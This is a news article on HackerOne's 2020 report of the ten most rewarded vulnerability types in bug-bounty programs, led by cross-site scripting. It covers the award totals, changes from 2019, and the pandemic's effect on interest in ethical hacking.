Bug-Bounty Awards Spike 26% in 2020

The most-rewarded flaw is XSS, which is among those that are relatively cheap for organizations to identify.

Cross-site scripting (XSS) remained the most impactful vulnerability and thus the one reaping the highest rewards for ethical hackers in 2020 for a second year running, according to a list of top 10 vulnerabilities released on Thursday by HackerOne.

The vulnerability — which enables attackers to inject client-side scripts into web pages viewed by other users — earned hackers $4.2 million in total bug-bounty awards in the last year, a 26-percent increase from what was paid out in 2019 for finding XSS flaws, according to the report.

Following XSS on the ethical hacking company’s list of “Top 10 Most Impactful and Rewarded Vulnerability Types of 2020” are: Improper access control, information disclosure, server-side request forgery (SSRF), insecure direct object reference (IDOR), privilege escalation, SQL injection, improper authentication, code injection and cross-site request forgery (CSRF).

In total, organizations paid ethical hackers $23.5 million in bug bounties for all of these flaws this year, according to HackerOne, which maintains a database of 200,000 vulnerabilities found by hackers.

Attackers use XSS vulnerabilities to gain control of an online user’s account and steal personal information such as passwords, bank account numbers, credit card info, personally identifiable information (PII), Social Security numbers and the like. While they account for 18 percent of all reported vulnerabilities, ethical hackers are actually underpaid for finding them, according to HackerOne.

A bug-bounty award for an XSS flaw is about $501, well below the $3,650 average award for a critical flaw, allowing organizations to mitigate the common bug on the cheap, researchers noted.

Indeed, researchers found that the more common a vulnerability is, the less ethical hackers are paid — and thus the less that organizations pay out — to locate and mitigate it, observed HackerOne senior director of product management, Miju Han.

“Finding the most common vulnerability types is inexpensive,” he said in a press statement, noting that only three of the top 10 vulnerabilities on the list — improper access control, server-side request forgery (SSRF) and information disclosure — saw their average bounty awards rise more than 10 percent over the course of the year.

This demonstrates that using ethical hackers to sniff out bugs potentially can be a more cost-effective value proposition for organizations than implementing “traditional security tools and methods, which become more expensive and cumbersome as goals change and attack surface expands,” Han said.

Of the vulnerabilities that saw their stock rise in 2020, improper access control rose from ninth place to second, and information disclosure, which held steady in third place for commonality, became more valuable on the bug-bounty market, researchers noted.

Awards for improper access control increased 134 percent year over year to slightly more than $4 million, while bug bounties for information disclosure rose 63 percent year over year.

Because access-control design decisions have to be made by humans, not technology, the potential for errors is high, researchers said. These flaws also are nearly impossible to detect using automated tools, which makes an ethical hacker’s ability to identify them more valuable, they said.

Indeed, even large tech companies who were historically resistant to being transparent about their product’s security protocols have warmed to the idea of awarding ethical hackers for their work. Both Apple and ByteDance’s TikTok rolled out public, award-based bug-bounty programs in the last 12 months.

Han noted that the boost in interest in ethical hacking in 2020 also has come due to the increased digitalization of organizations’ products and services due to the COVID-19 pandemic and its stay-at-home orders.

“Businesses scrambled to find new revenue streams, creating digital offerings for customers whose lifestyles had dramatically changed,” he said in the statement. “Tens of millions of workers started working remotely whether or not they were ready.”

This “accelerated pace of digital transformation” gave security leaders a new perspective on using ethical hacking to augment existing security resources, making them more willing to support a pay-for-results-based approach, Han added.